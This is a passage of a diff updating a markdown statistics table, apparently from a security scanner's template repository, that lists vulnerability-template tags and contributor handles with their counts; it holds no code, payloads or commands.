| | | | | +| network | 194 | adam crosser | 31 | | | | | | | +| token | 193 | luisfelipe146 | 31 | | | | | | | +| | 191 | mastercho | 29 | | | | | | | +| apache | 188 | ice3man | 29 | | | | | | | +| devops | 176 | pwnhxl | 28 | | | | | | | +| cve2018 | 169 | hardik-solanki | 24 | | | | | | | +| iot | 166 | organiccrap | 24 | | | | | | | +| cve2019 | 165 | techbrunchfr | 23 | | | | | | | +| keys | 155 | ctflearner | 23 | | | | | | | +| joomla | 148 | harsh | 23 | | | | | | | +| malware | 142 | ffffffff0x | 22 | | | | | | | +| redirect | 135 | parthmalhotra | 20 | | | | | | | +| aws | 133 | sullo | 18 | | | | | | | +| cloud | 132 | cckuailong | 18 | | | | | | | +| auth-bypass | 129 | 0xpugazh | 16 | | | | | | | +| ssrf | 119 | shaikhyaser | 16 | | | | | | | | phishing | 117 | random-robbie | 16 | | | | | | | | amazon | 116 | lu4nx | 16 | | | | | | | -| files | 113 | pr3r00t | 15 | | | | | | | -| cve2010 | 112 | sheikhrishad | 15 | | | | | | | -| cve2017 | 110 | unapibageek | 15 | | | | | | | -| router | 108 | bhutch | 14 | | | | | | | -| cms | 108 | milo2012 | 14 | | | | | | | -| install | 106 | tenbird | 14 | | | | | | | -| top-100 | 100 | r3dg33k | 14 | | | | | | | -| aws-cloud-config | 89 | dogasantos | 14 | | | | | | | -| disclosure | 88 | nullfuzz | 13 | | | | | | | -| linux | 83 | sharath | 13 | | | | | | | -| code | 81 | elsfa7110 | 13 | | | | | | | -| local | 80 | melbadry9 | 13 | | | | | | | -| seclists | 79 | theabhinavgaur | 13 | | | | | | | -| privesc | 79 | 0ri2n | 13 | | | | | | | -| takeover | 78 | meme-lord | 12 | | | | | | | -| tokens | 78 | kazet | 12 | | | | | | | -| fileupload | 76 | suman_kar | 12 | | | | | | | -| oracle | 70 | wdahlenb | 11 | | | | | | | +| files | 113 | sheikhrishad | 15 | | | | | | | +| cve2010 | 112 | unapibageek | 15 | | | | | | | +| cms | 110 | bhutch | 15 | | | | | | | +| cve2017 | 110 | pr3r00t | 15 | | | | | | | +| router | 108 | milo2012 | 14 | | | | | | | +| install | 107 | kazgangap | 14 | | | | | | | +| top-100 | 100 | dogasantos | 14 | | | | | | | +| disclosure | 89 | r3dg33k | 14 | | | | | | | +| aws-cloud-config | 89 | tenbird | 14 | | | | | | | +| linux | 83 | melbadry9 | 13 | | | | | | | +| code | 81 | 0ri2n | 13 | | | | | | | +| local | 80 | theabhinavgaur | 13 | | | | | | | +| takeover | 79 | sharath | 13 | | | | | | | +| seclists | 79 | nullfuzz | 13 | | | | | | | +| privesc | 79 | elsfa7110 | 13 | | | | | | | +| tokens | 78 | suman_kar | 12 | | | | | | | +| fileupload | 76 | kazet | 12 | | | | | | | +| oracle | 70 | meme-lord | 12 | | | | | | | | oss | 67 | cyllective | 11 | | | | | | | -| cisco | 66 | logicalhunter | 10 | | | | | | | -| js | 62 | co5mos | 10 | | | | | | | -| adobe | 62 | 0x240x23elu | 10 | | | | | | | -| ir | 61 | alph4byt3 | 10 | | | | | | | -| huntr | 59 | random_robbie | 10 | | | | | | | -| cve2015 | 58 | nadino | 10 | | | | | | | -| cve2016 | 57 | hackergautam | 10 | | | | | | | -| atlassian | 57 | adamcrosser | 9 | | | | | | | -| google | 56 | initstring | 9 | | | | | | | -| vmware | 56 | oppsec | 9 | | | | | | | -| enum | 55 | fabaff | 9 | | | | | | | -| c2 | 55 | olearycrew | 9 | | | | | | | -| tenable | 48 | emadshanab | 9 | | | | | | | -| logs | 48 | momika233 | 9 | | | | | | | -| log4j | 47 | that_juan_ | 8 | | | | | | | -| hackerone | 46 | veshraj | 8 | | | | | | | -| vulhub | 46 | noraj | 8 | | | | | | | -| aem | 45 | iamthefrogy | 8 | | | | | | | -| osint-gaming | 45 | zh | 8 | | | | | | | -| cve2014 | 44 | aashiq | 8 | | | | | | | -| jndi | 44 | irshad ahamed | 8 | | | | | | | -| debug | 44 | _0xf4n9x_ | 8 | | | | | | | -| php | 44 | leovalcante | 7 | | | | | | | +| cisco | 66 | wdahlenb | 11 | | | | | | | +| cve2024 | 63 | 0x240x23elu | 10 | | | | | | | +| js | 62 | nadino | 10 | | | | | | | +| adobe | 62 | alph4byt3 | 10 | | | | | | | +| ir | 61 | random_robbie | 10 | | | | | | | +| cve2015 | 59 | co5mos | 10 | | | | | | | +| huntr | 59 | hackergautam | 10 | | | | | | | +| atlassian | 57 | logicalhunter | 10 | | | | | | | +| cve2016 | 57 | fabaff | 9 | | | | | | | +| google | 56 | adamcrosser | 9 | | | | | | | +| vmware | 56 | initstring | 9 | | | | | | | +| enum | 55 | oppsec | 9 | | | | | | | +| c2 | 55 | emadshanab | 9 | | | | | | | +| logs | 48 | olearycrew | 9 | | | | | | | +| tenable | 48 | momika233 | 9 | | | | | | | +| log4j | 47 | _0xf4n9x_ | 8 | | | | | | | +| hackerone | 46 | iamthefrogy | 8 | | | | | | | +| vulhub | 46 | veshraj | 8 | | | | | | | +| aem | 45 | aashiq | 8 | | | | | | | +| osint-gaming | 45 | irshad ahamed | 8 | | | | | | | +| jndi | 44 | that_juan_ | 8 | | | | | | | +| cve2014 | 44 | noraj | 8 | | | | | | | +| php | 44 | zh | 8 | | | | | | | +| debug | 44 | huta0 | 7 | | | | | | | | deserialization | 43 | tarunkoyalwar | 7 | | | | | | | -| cve2024 | 42 | me_dheeraj | 7 | | | | | | | +| plugin | 42 | amit-jd | 7 | | | | | | | +| generic | 42 | caspergn | 7 | | | | | | | +| traversal | 42 | me_dheeraj | 7 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| traversal | 42 | randomstr1ng | 7 | | | | | | | -| plugin | 42 | its0x08 | 7 | | | | | | | -| generic | 42 | techryptic (@tech) | 7 | | | | | | | -| oa | 42 | harshbothra_ | 7 | | | | | | | -| osint-porn | 42 | amit-jd | 7 | | | | | | | -| osint-hobby | 42 | huta0 | 7 | | | | | | | -| springboot | 41 | dr_set | 7 | | | | | | | -| microsoft | 39 | divya_mudgal | 7 | | | | | | | -| cnvd | 39 | nodauf | 7 | | | | | | | -| misc | 39 | caspergn | 7 | | | | | | | -| injection | 38 | kophjager007 | 7 | | | | | | | -| kubernetes | 37 | byt3bl33d3r | 6 | | | | | | | -| jira | 37 | kazgangap | 6 | | | | | | | -| listing | 37 | hahwul | 6 | | | | | | | -| ibm | 36 | gitlab red team | 6 | | | | | | | -| cti | 36 | evan rubinstein | 6 | | | | | | | -| osint-misc | 35 | imnightmaree | 6 | | | | | | | -| sap | 34 | justaacat | 6 | | | | | | | -| ssl | 33 | pentest_swissky | 6 | | | | | | | -| fuzz | 33 | xelkomy | 6 | | | | | | | -| miscellaneous | 32 | megamansec | 6 | | | | | | | -| osint-tech | 31 | clem9669 | 6 | | | | | | | -| tls | 30 | __fazal | 6 | | | | | | | -| osint-coding | 30 | forgedhallpass | 6 | | | | | | | -| ec2 | 30 | devang-solanki | 6 | | | | | | | +| osint-porn | 42 | its0x08 | 7 | | | | | | | +| osint-hobby | 42 | kophjager007 | 7 | | | | | | | +| oa | 42 | techryptic (@tech) | 7 | | | | | | | +| springboot | 41 | randomstr1ng | 7 | | | | | | | +| misc | 39 | dr_set | 7 | | | | | | | +| cnvd | 39 | harshbothra_ | 7 | | | | | | | +| microsoft | 38 | divya_mudgal | 7 | | | | | | | +| injection | 38 | leovalcante | 7 | | | | | | | +| jira | 37 | nodauf | 7 | | | | | | | +| listing | 37 | gitlab red team | 6 | | | | | | | +| kubernetes | 37 | __fazal | 6 | | | | | | | +| cti | 36 | clem9669 | 6 | | | | | | | +| ibm | 36 | evan rubinstein | 6 | | | | | | | +| osint-misc | 35 | justaacat | 6 | | | | | | | +| sap | 34 | ja1sh | 6 | | | | | | | +| ssl | 33 | megamansec | 6 | | | | | | | +| fuzz | 33 | imnightmaree | 6 | | | | | | | +| miscellaneous | 32 | byt3bl33d3r | 6 | | | | | | | +| osint-tech | 31 | pentest_swissky | 6 | | | | | | | +| ec2 | 30 | xelkomy | 6 | | | | | | | +| tls | 30 | praetorian-thendrickson | 6 | | | | | | | +| osint-coding | 30 | pathtaga | 6 | | | | | | | | dlink | 29 | puzzlepeaches | 6 | | | | | | | -| gitlab | 28 | praetorian-thendrickson | 6 | | | | | | | -| k8s | 28 | ja1sh | 6 | | | | | | | -| api | 28 | pathtaga | 6 | | | | | | | -| wp-theme | 28 | mr-xn | 5 | | | | | | | -| ssh | 28 | kh4sh3i | 5 | | | | | | | -| bestwebsoft | 27 | vicrack | 5 | | | | | | | -| fortinet | 27 | s0obi | 5 | | | | | | | -| cve2012 | 26 | shine | 5 | | | | | | | -| citrix | 26 | panch0r3d | 5 | | | | | | | -| manageengine | 25 | defr0ggy | 5 | | | | | | | -| proxy | 25 | podalirius | 5 | | | | | | | -| firewall | 25 | arm!tage | 5 | | | | | | | -| weaver | 25 | gtrrnr | 5 | | | | | | | -| zohocorp | 25 | r12w4n | 5 | | | | | | | -| lfr | 24 | your3cho | 5 | | | | | | | -| admin | 24 | andreluna | 5 | | | | | | | -| osint-images | 24 | r3naissance | 5 | | | | | | | -| dns | 24 | joanbono | 5 | | | | | | | -| osint-business | 24 | ganofins | 5 | | | | | | | -| zoho | 24 | yanyun | 5 | | | | | | | -| osint-finance | 24 | robotshell | 5 | | | | | | | -| osint-shopping | 24 | lucky0x0d | 5 | | | | | | | -| audit | 23 | powerexploit | 5 | | | | | | | -| tomcat | 23 | prajiteshsingh | 5 | | | | | | | -| yonyou | 23 | xxcdd | 4 | | | | | | | -| stored-xss | 23 | m4lwhere | 4 | | | | | | | -| xxe | 23 | iamnooob | 4 | | | | | | | -| s3 | 22 | scent2d | 4 | | | | | | | -| cicd | 22 | pulsesecurity.co.nz | 4 | | | | | | | -| ecology | 21 | nybble04 | 4 | | | | | | | -| msf | 21 | e_schultze_ | 4 | | | | | | | -| weblogic | 21 | 0xr2r | 4 | | | | | | | +| wp-theme | 29 | hahwul | 6 | | | | | | | +| gitlab | 28 | devang-solanki | 6 | | | | | | | +| api | 28 | forgedhallpass | 6 | | | | | | | +| ssh | 28 | shine | 5 | | | | | | | +| k8s | 28 | ganofins | 5 | | | | | | | +| bestwebsoft | 27 | andreluna | 5 | | | | | | | +| fortinet | 27 | defr0ggy | 5 | | | | | | | +| citrix | 27 | your3cho | 5 | | | | | | | +| proxy | 26 | s0obi | 5 | | | | | | | +| cve2012 | 26 | panch0r3d | 5 | | | | | | | +| lfr | 25 | lucky0x0d | 5 | | | | | | | +| firewall | 25 | gtrrnr | 5 | | | | | | | +| manageengine | 25 | podalirius | 5 | | | | | | | +| weaver | 25 | r3naissance | 5 | | | | | | | +| zohocorp | 25 | vicrack | 5 | | | | | | | +| osint-images | 24 | prajiteshsingh | 5 | | | | | | | +| osint-business | 24 | robotshell | 5 | | | | | | | +| dns | 24 | powerexploit | 5 | | | | | | | +| admin | 24 | joanbono | 5 | | | | | | | +| osint-finance | 24 | yanyun | 5 | | | | | | | +| osint-shopping | 24 | mr-xn | 5 | | | | | | | +| zoho | 24 | kh4sh3i | 5 | | | | | | | +| yonyou | 23 | arm!tage | 5 | | | | | | | +| tomcat | 23 | r12w4n | 5 | | | | | | | +| xxe | 23 | 3th1c_yuk1 | 4 | | | | | | | +| audit | 23 | jpg0mez | 4 | | | | | | | +| stored-xss | 23 | h1ei1 | 4 | | | | | | | +| file-upload | 23 | pulsesecurity.co.nz | 4 | | | | | | | +| prestashop | 22 | wisnupramoedya | 4 | | | | | | | +| cicd | 22 | cookiehanhoan | 4 | | | | | | | +| s3 | 22 | shankar acharya | 4 | | | | | | | +| msf | 21 | heeress | 4 | | | | | | | +| github | 21 | nybble04 | 4 | | | | | | | | printer | 21 | ggranjus | 4 | | | | | | | -| dast | 21 | ice3man543 | 4 | | | | | | | -| file-upload | 21 | cookiehanhoan | 4 | | | | | | | -| github | 21 | jpg0mez | 4 | | | | | | | -| camera | 20 | shankar acharya | 4 | | | | | | | -| jenkins | 20 | lum8rjack | 4 | | | | | | | -| rukovoditel | 19 | wisnupramoedya | 4 | | | | | | | -| hp | 19 | k0pak4 | 4 | | | | | | | -| ftp | 19 | h1ei1 | 4 | | | | | | | -| grafana | 19 | incogbyte | 4 | | | | | | | -| struts | 19 | dolev farhi | 4 | | | | | | | -| wavlink | 19 | 3th1c_yuk1 | 4 | | | | | | | -| coldfusion | 18 | heeress | 4 | | | | | | | +| ecology | 21 | dolev farhi | 4 | | | | | | | +| weblogic | 21 | incogbyte | 4 | | | | | | | +| dast | 21 | dadevel | 4 | | | | | | | +| jenkins | 20 | k0pak4 | 4 | | | | | | | +| camera | 20 | e_schultze_ | 4 | | | | | | | +| hp | 19 | scent2d | 4 | | | | | | | +| grafana | 19 | 0xr2r | 4 | | | | | | | +| struts | 19 | xxcdd | 4 | | | | | | | +| wavlink | 19 | ice3man543 | 4 | | | | | | | +| rukovoditel | 19 | m4lwhere | 4 | | | | | | | +| ftp | 19 | lum8rjack | 4 | | | | | | | +| cve2011 | 18 | iamnooob | 4 | | | | | | | +| android | 18 | king-alexander | 4 | | | | | | | | osint-music | 18 | tanq16 | 4 | | | | | | | -| cve2011 | 18 | king-alexander | 4 | | | | | | | -| android | 18 | dadevel | 4 | | | | | | | -| prestashop | 18 | ekrause | 3 | | | | | | | -| ruijie | 18 | fyoorer | 3 | | | | | | | -| confluence | 17 | fxploit | 3 | | | | | | | -| azure | 17 | salts | 3 | | | | | | | -| node.js | 17 | true13 | 3 | | | | | | | -| nginx | 17 | badboycxcc | 3 | | | | | | | -| service | 17 | mavericknerd | 3 | | | | | | | -| cve2009 | 16 | lucasljm2001 | 3 | | | | | | | -| honeypot | 16 | 0w4ys | 3 | | | | | | | -| rconfig | 16 | atomiczsec | 3 | | | | | | | -| status | 16 | dr0pd34d | 3 | | | | | | | -| backup | 16 | vsh00t | 3 | | | | | | | -| vpn | 16 | impramodsargar | 3 | | | | | | | -| mail | 16 | ambassify | 3 | | | | | | | -| osint-blog | 16 | davidmckennirey | 3 | | | | | | | -| alibaba | 16 | _generic_human_ | 3 | | | | | | | -| microweber | 16 | bernardofsr | 3 | | | | | | | -| jarm | 16 | coldfish | 3 | | | | | | | -| ruby | 15 | sushantkamble | 3 | | | | | | | -| backdoor | 15 | e1a | 3 | | | | | | | -| cve2008 | 15 | yuzhe-zhang-0 | 3 | | | | | | | -| cve2013 | 15 | evergreencartoons | 3 | | | | | | | -| magento | 15 | shifacyclewala | 3 | | | | | | | -| tongda | 15 | binaryfigments | 3 | | | | | | | -| cnvd2021 | 15 | alifathi-h1 | 3 | | | | | | | -| seeyon | 15 | f1tz | 3 | | | | | | | -| java | 15 | ph33r | 3 | | | | | | | -| nodejs | 15 | andydoering | 3 | | | | | | | -| woocommerce | 15 | emenalf | 3 | | | | | | | -| dashboard | 15 | randomrobbie | 3 | | | | | | | -| zyxel | 15 | matt galligan | 3 | | | | | | | -| bypass | 15 | jarijaas | 3 | | | | | | | -| creds-stuffing | 14 | aringo | 3 | | | | | | | -| headless | 14 | thomas_from_offensity | 3 | | | | | | | -| nagios | 14 | farish | 3 | | | | | | | -| domainmod | 14 | z3bd | 3 | | | | | | | -| redis | 14 | j3ssie | 3 | | | | | | | -| osint-health | 14 | taielab | 3 | | | | | | | -| auth | 14 | splint3r7 | 3 | | | | | | | -| rds | 14 | imjust0 | 3 | | | | | | | -| node | 14 | isacaya | 3 | | | | | | | -| osint-art | 14 | swissky | 3 | | | | | | | -| jboss | 14 | skeltavik | 3 | | | | | | | -| windows | 14 | yash anand @yashanand155 | 3 | | | | | | | -| smtp | 14 | vagnerd | 3 | | | | | | | +| ruijie | 18 | _generic_human_ | 3 | | | | | | | +| coldfusion | 18 | vsh00t | 3 | | | | | | | +| confluence | 17 | canberbamber | 3 | | | | | | | +| service | 17 | sushantkamble | 3 | | | | | | | +| mail | 17 | ambassify | 3 | | | | | | | +| nginx | 17 | skeltavik | 3 | | | | | | | +| azure | 17 | atomiczsec | 3 | | | | | | | +| node.js | 17 | c4sper0 | 3 | | | | | | | +| backup | 16 | splint3r7 | 3 | | | | | | | +| honeypot | 16 | me9187 | 3 | | | | | | | +| magento | 16 | yuzhe-zhang-0 | 3 | | | | | | | +| vpn | 16 | fxploit | 3 | | | | | | | +| status | 16 | thomas_from_offensity | 3 | | | | | | | +| osint-blog | 16 | binaryfigments | 3 | | | | | | | +| microweber | 16 | farish | 3 | | | | | | | +| alibaba | 16 | xianke | 3 | | | | | | | +| jarm | 16 | alifathi-h1 | 3 | | | | | | | +| cve2009 | 16 | fyoorer | 3 | | | | | | | +| rconfig | 16 | lark-lab | 3 | | | | | | | +| bypass | 15 | salts | 3 | | | | | | | +| zyxel | 15 | aringo | 3 | | | | | | | +| nodejs | 15 | 0w4ys | 3 | | | | | | | +| seeyon | 15 | davidmckennirey | 3 | | | | | | | +| cve2008 | 15 | andydoering | 3 | | | | | | | +| dashboard | 15 | flx | 3 | | | | | | | +| java | 15 | bernardofsr | 3 | | | | | | | +| cve2013 | 15 | badboycxcc | 3 | | | | | | | +| cnvd2021 | 15 | userdehghani | 3 | | | | | | | +| backdoor | 15 | impramodsargar | 3 | | | | | | | +| ruby | 15 | whoever | 3 | | | | | | | +| tongda | 15 | matt galligan | 3 | | | | | | | +| woocommerce | 15 | randomrobbie | 3 | | | | | | | +| setup | 14 | true13 | 3 | | | | | | | +| osint-art | 14 | isacaya | 3 | | | | | | | +| login-check | 14 | arcc | 3 | | | | | | | +| ssti | 14 | e1a | 3 | | | | | | | +| windows | 14 | ph33r | 3 | | | | | | | +| creds-stuffing | 14 | imjust0 | 3 | | | | | | | +| auth | 14 | dr0pd34d | 3 | | | | | | | +| dell | 14 | f1tz | 3 | | | | | | | +| redhat | 14 | mavericknerd | 3 | | | | | | | +| osint-health | 14 | lucasljm2001 | 3 | | | | | | | +| git | 14 | taielab | 3 | | | | | | | | icewarp | 14 | unstabl3 | 3 | | | | | | | -| setup | 14 | cheesymoon | 3 | | | | | | | -| npm | 14 | xianke | 3 | | | | | | | -| dell | 14 | arcc | 3 | | | | | | | -| redhat | 14 | johnjhacking | 3 | | | | | | | -| docker | 14 | me9187 | 3 | | | | | | | -| smb | 14 | parth | 3 | | | | | | | -| login-check | 14 | huowuzhao | 3 | | | | | | | -| cuppacms | 13 | whoever | 3 | | | | | | | -| mysql | 13 | lark-lab | 3 | | | | | | | -| osint-political | 13 | canberbamber | 3 | | | | | | | -| ssti | 13 | flx | 3 | | | | | | | -| airflow | 13 | dudez | 3 | | | | | | | -| git | 13 | bsysop | 2 | | | | | | | -| osint-dating | 13 | 666asd | 2 | | | | | | | -| abstractapi | 13 | manas_harsh | 2 | | | | | | | -| netgear | 13 | nuk3s3c | 2 | | | | | | | -| sonicwall | 13 | d4vy | 2 | | | | | | | -| laravel | 13 | thardt-praetorian | 2 | | | | | | | -| fortigate | 13 | c4sper0 | 2 | | | | | | | -| cuppa | 13 | w4cky_ | 2 | | | | | | | -| postgresql | 13 | usdag | 2 | | | | | | | -| rails | 13 | sinkettu | 2 | | | | | | | -| ivanti | 13 | amsda | 2 | | | | | | | -| graphql | 13 | arliya | 2 | | | | | | | -| hashicorp | 13 | koti2 | 2 | | | | | | | -| drupal | 12 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| doppler | 12 | cocxanh | 2 | | | | | | | -| kafka | 12 | supr4s | 2 | | | | | | | -| webserver | 12 | pbuff07 | 2 | | | | | | | -| ofbiz | 12 | codexlynx | 2 | | | | | | | -| newrelic | 12 | y4er | 2 | | | | | | | -| zimbra | 12 | 0xnirvana | 2 | | | | | | | -| moosocial | 12 | florianmaak | 2 | | | | | | | -| netsweeper | 12 | raesene | 2 | | | | | | | -| iis | 11 | kre80r | 2 | | | | | | | -| iam | 11 | ayadim | 2 | | | | | | | -| phpgurukul | 11 | pxmme1337 | 2 | | | | | | | -| jetbrains | 11 | msegoviag | 2 | | | | | | | -| cache | 11 | gevakun | 2 | | | | | | | -| online_fire_reporting_system_project | 11 | paperpen | 2 | | | | | | | -| vbulletin | 11 | joshua rogers | 2 | | | | | | | -| spring | 11 | cckuakilong | 2 | | | | | | | -| online-fire-reporting | 11 | ehsahil | 2 | | | | | | | -| django | 11 | ree4pwn | 2 | | | | | | | -| jolokia | 11 | michal mikolas (nanuqcz) | 2 | | | | | | | -| osint-video | 11 | kishore-hariram | 2 | | | | | | | -| xstream | 11 | supras | 2 | | | | | | | -| fastjson | 11 | mzack9999 | 2 | | | | | | | -| phpmyadmin | 11 | 0xsapra | 2 | | | | | | | -| prometheus | 11 | k11h-de | 2 | | | | | | | -| dedecms | 10 | danmcinerney | 2 | | | | | | | -| sitecore | 10 | uomogrande | 2 | | | | | | | -| elasticsearch | 10 | charles d. | 2 | | | | | | | -| hikvision | 10 | sbani | 2 | | | | | | | -| info-leak | 10 | 0xrudra | 2 | | | | | | | -| glpi | 10 | redteambrasil | 2 | | | | | | | -| solarview | 10 | x1m_martijn | 2 | | | | | | | -| thinkphp | 10 | bing0o | 2 | | | | | | | -| symfony | 10 | wa1tf0rme | 2 | | | | | | | -| db | 10 | nvn1729 | 2 | | | | | | | -| installer | 10 | mrharshvardhan | 2 | | | | | | | -| solr | 10 | luci | 2 | | | | | | | -| dropbox | 10 | thevillagehacker | 2 | | | | | | | -| xstream_project | 10 | myztique | 2 | | | | | | | -| digitalocean | 10 | dogancanbakir | 2 | | | | | | | -| zabbix | 10 | hetroublemakr | 2 | | | | | | | -| samsung | 10 | joeldeleep | 2 | | | | | | | -| opencats | 9 | h0j3n | 2 | | | | | | | -| sophos | 9 | ep1csage | 2 | | | | | | | -| elastic | 9 | nkxxkn | 2 | | | | | | | -| bitbucket | 9 | geekby | 2 | | | | | | | -| dahua | 9 | g4l1t0 | 2 | | | | | | | -| scada | 9 | foulenzer | 2 | | | | | | | -| cloudtrail | 9 | zomsop82 | 2 | | | | | | | -| versa | 9 | mohammedsaneem | 2 | | | | | | | -| druid | 9 | v0idc0de | 2 | | | | | | | -| wso2 | 9 | dbrwsky | 2 | | | | | | | -| kube | 9 | ajaysenr | 2 | | | | | | | -| moodle | 9 | socketz | 2 | | | | | | | -| firebase | 9 | rafaelwdornelas | 2 | | | | | | | -| vcenter | 9 | christianpoeschl | 2 | | | | | | | -| crlf | 9 | 6mile | 2 | | | | | | | -| progress | 9 | paradessia | 2 | | | | | | | -| facebook | 9 | 8arthur | 2 | | | | | | | -| cnvd2020 | 9 | randomdhiraj | 2 | | | | | | | -| pfsense | 9 | gal nagli | 2 | | | | | | | -| artica | 9 | n-thumann | 2 | | | | | | | -| secret | 9 | z0ne | 2 | | | | | | | -| blind | 9 | clarkvoss | 2 | | | | | | | -| sangfor | 9 | github.com/its0x08 | 2 | | | | | | | -| exchange | 9 | brucelsone | 2 | | | | | | | -| gitea | 9 | korteke | 2 | | | | | | | -| lucee | 9 | herry | 2 | | | | | | | -| python | 9 | davidegirardi | 2 | | | | | | | -| atom | 8 | notnotnotveg | 2 | | | | | | | -| mlflow | 8 | zy9ard3 | 2 | | | | | | | -| unauthenticated | 8 | bmcel | 2 | | | | | | | -| osint-news | 8 | moritz nentwig | 2 | | | | | | | -| recon | 8 | 0xcrypto | 2 | | | | | | | -| emerge | 8 | parzival | 2 | | | | | | | -| oauth | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| console | 8 | sascha brendel | 2 | | | | | | | +| nagios | 14 | dudez | 3 | | | | | | | +| domainmod | 14 | vagnerd | 3 | | | | | | | +| jboss | 14 | shifacyclewala | 3 | | | | | | | +| docker | 14 | jarijaas | 3 | | | | | | | +| redis | 14 | parth | 3 | | | | | | | +| headless | 14 | ekrause | 3 | | | | | | | +| node | 14 | j3ssie | 3 | | | | | | | +| npm | 14 | cheesymoon | 3 | | | | | | | +| smtp | 14 | emenalf | 3 | | | | | | | +| rds | 14 | huowuzhao | 3 | | | | | | | +| smb | 14 | z3bd | 3 | | | | | | | +| mysql | 13 | coldfish | 3 | | | | | | | +| cuppa | 13 | evergreencartoons | 3 | | | | | | | +| airflow | 13 | johnjhacking | 3 | | | | | | | +| postgresql | 13 | swissky | 3 | | | | | | | +| abstractapi | 13 | yash anand @yashanand155 | 3 | | | | | | | +| fortigate | 13 | k11h-de | 2 | | | | | | | +| laravel | 13 | thabisocn | 2 | | | | | | | +| graphql | 13 | sascha brendel | 2 | | | | | | | +| osint-dating | 13 | mrharshvardhan | 2 | | | | | | | +| rails | 13 | myztique | 2 | | | | | | | +| sonicwall | 13 | joshlarsen | 2 | | | | | | | +| moosocial | 13 | h0j3n | 2 | | | | | | | +| netgear | 13 | korteke | 2 | | | | | | | +| cuppacms | 13 | w4cky_ | 2 | | | | | | | +| hashicorp | 13 | raesene | 2 | | | | | | | +| osint-political | 13 | amsda | 2 | | | | | | | +| ivanti | 13 | parzival | 2 | | | | | | | +| drupal | 12 | thezakman | 2 | | | | | | | +| zimbra | 12 | joshua rogers | 2 | | | | | | | +| kafka | 12 | paperpen | 2 | | | | | | | +| netsweeper | 12 | cocxanh | 2 | | | | | | | +| webserver | 12 | bananabr | 2 | | | | | | | +| vbulletin | 12 | dahse89 | 2 | | | | | | | +| newrelic | 12 | michal mikolas (nanuqcz) | 2 | | | | | | | +| ofbiz | 12 | g4l1t0 | 2 | | | | | | | +| doppler | 12 | mzack9999 | 2 | | | | | | | +| cache | 11 | brucelsone | 2 | | | | | | | +| prometheus | 11 | ree4pwn | 2 | | | | | | | +| info-leak | 11 | udit_thakkur | 2 | | | | | | | +| jetbrains | 11 | 6mile | 2 | | | | | | | +| hikvision | 11 | christianpoeschl | 2 | | | | | | | +| django | 11 | paradessia | 2 | | | | | | | +| spring | 11 | danmcinerney | 2 | | | | | | | +| xstream | 11 | arliya | 2 | | | | | | | +| online-fire-reporting | 11 | geekby | 2 | | | | | | | +| iam | 11 | notnotnotveg | 2 | | | | | | | +| iis | 11 | shankaracharya | 2 | | | | | | | +| phpgurukul | 11 | thevillagehacker | 2 | | | | | | | +| jolokia | 11 | bing0o | 2 | | | | | | | +| fastjson | 11 | gal nagli | 2 | | | | | | | +| osint-video | 11 | thardt-praetorian | 2 | | | | | | | +| online_fire_reporting_system_project | 11 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| phpmyadmin | 11 | shelled | 2 | | | | | | | +| installer | 11 | sbani | 2 | | | | | | | +| dedecms | 10 | v0idc0de | 2 | | | | | | | +| samsung | 10 | herry | 2 | | | | | | | +| solr | 10 | github.com/its0x08 | 2 | | | | | | | +| db | 10 | wa1tf0rme | 2 | | | | | | | +| elasticsearch | 10 | bsysop | 2 | | | | | | | +| solarview | 10 | pxmme1337 | 2 | | | | | | | +| digitalocean | 10 | d4vy | 2 | | | | | | | +| sitecore | 10 | randomdhiraj | 2 | | | | | | | +| symfony | 10 | foulenzer | 2 | | | | | | | +| glpi | 10 | 666asd | 2 | | | | | | | +| thinkphp | 10 | joeldeleep | 2 | | | | | | | +| zabbix | 10 | lotusdll | 2 | | | | | | | +| xstream_project | 10 | zy9ard3 | 2 | | | | | | | +| dropbox | 10 | koti2 | 2 | | | | | | | +| firebase | 9 | dogancanbakir | 2 | | | | | | | +| opencats | 9 | 0xnirvana | 2 | | | | | | | +| elastic | 9 | 0xsapra | 2 | | | | | | | +| scada | 9 | 0xrudra | 2 | | | | | | | +| secret | 9 | kiblyn11 | 2 | | | | | | | +| exchange | 9 | usdag | 2 | | | | | | | +| sangfor | 9 | supr4s | 2 | | | | | | | +| artica | 9 | charles d. | 2 | | | | | | | +| lucee | 9 | c3l3si4n | 2 | | | | | | | +| python | 9 | bmcel | 2 | | | | | | | +| gitea | 9 | hetroublemakr | 2 | | | | | | | +| dahua | 9 | x1m_martijn | 2 | | | | | | | +| druid | 9 | brenocss | 2 | | | | | | | +| wso2 | 9 | martincodes-de | 2 | | | | | | | +| pfsense | 9 | danielmofer | 2 | | | | | | | +| vcenter | 9 | 0xsmiley | 2 | | | | | | | +| versa | 9 | sinkettu | 2 | | | | | | | +| sophos | 9 | zomsop82 | 2 | | | | | | | +| cloudtrail | 9 | streetofhackerr007 | 2 | | | | | | | +| progress | 9 | y4er | 2 | | | | | | | +| facebook | 9 | afaq | 2 | | | | | | | +| blind | 9 | florianmaak | 2 | | | | | | | +| cnvd2020 | 9 | sy3omda | 2 | | | | | | | +| moodle | 9 | kishore-hariram | 2 | | | | | | | +| crlf | 9 | bp0lr | 2 | | | | | | | +| kube | 9 | pbuff07 | 2 | | | | | | | +| bitbucket | 9 | lstatro | 2 | | | | | | | +| e-office | 8 | kre80r | 2 | | | | | | | +| ognl | 8 | redteambrasil | 2 | | | | | | | +| hms | 8 | ajaysenr | 2 | | | | | | | +| phpjabbers | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| spotweb | 8 | ricardo maia (brainfork) | 2 | | | | | | | +| phpinfo | 8 | vavkamil | 2 | | | | | | | +| gateway | 8 | 0xcrypto | 2 | | | | | | | +| discord | 8 | supras | 2 | | | | | | | +| recon | 8 | cckuakilong | 2 | | | | | | | +| odoo | 8 | t3l3machus | 2 | | | | | | | +| console | 8 | ehsahil | 2 | | | | | | | +| mlflow | 8 | nvn1729 | 2 | | | | | | | +| bucket | 8 | nkxxkn | 2 | | | | | | | +| cloud-enum | 8 | convisoappsec | 2 | | | | | | | +| config-audit | 8 | codexlynx | 2 | | | | | | | +| manager | 8 | mohammedsaneem | 2 | | | | | | | | spotweb_project | 8 | dheerajmadhukar | 2 | | | | | | | -| wanhu | 8 | streetofhackerr007 | 2 | | | | | | | -| e-office | 8 | sy3omda | 2 | | | | | | | -| odoo | 8 | bananabr | 2 | | | | | | | -| go | 8 | shankaracharya | 2 | | | | | | | -| default-page | 8 | brenocss | 2 